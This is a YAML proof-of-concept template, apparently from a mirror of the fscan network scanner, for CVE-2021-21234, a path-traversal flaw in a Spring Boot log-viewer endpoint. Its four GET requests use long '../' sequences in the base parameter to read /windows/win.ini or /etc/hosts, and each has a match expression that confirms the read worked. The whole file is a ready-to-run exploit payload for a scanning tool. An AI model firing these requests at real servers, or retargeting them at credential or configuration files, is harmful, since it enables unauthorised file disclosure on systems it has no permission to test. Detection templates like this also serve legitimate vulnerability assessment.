mirror of
https://github.com/shadow1ng/fscan.git
synced 2025-06-02 11:40:24 +00:00
23 lines
1.3 KiB
YAML
23 lines
1.3 KiB
YAML
name: poc-yaml-springboot-cve-2021-21234
|
|
groups:
|
|
spring1:
|
|
- method: GET
|
|
path: /manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
|
|
expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support") && response.body.bcontains(b"fonts") && !response.body.bcontains(b"<html")
|
|
spring2:
|
|
- method: GET
|
|
path: /log/view?filename=/windows/win.ini&base=../../../../../../../../../../
|
|
expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support") && response.body.bcontains(b"fonts") && !response.body.bcontains(b"<html")
|
|
spring3:
|
|
- method: GET
|
|
path: /manage/log/view?filename=/etc/hosts&base=../../../../../../../../../../
|
|
expression: response.status == 200 && response.body.bcontains(b"127.0.0.1") && response.body.bcontains(b"localhost") && !response.body.bcontains(b"<html")
|
|
spring4:
|
|
- method: GET
|
|
path: /log/view?filename=/etc/hosts&base=../../../../../../../../../../
|
|
expression: response.status == 200 && response.body.bcontains(b"127.0.0.1") && response.body.bcontains(b"localhost") && !response.body.bcontains(b"<html")
|
|
detail:
|
|
author: iak3ec(https://github.com/nu0l)
|
|
links:
|
|
- https://mp.weixin.qq.com/s/ZwhBEz2ek26Zf3F-csoRgQ
|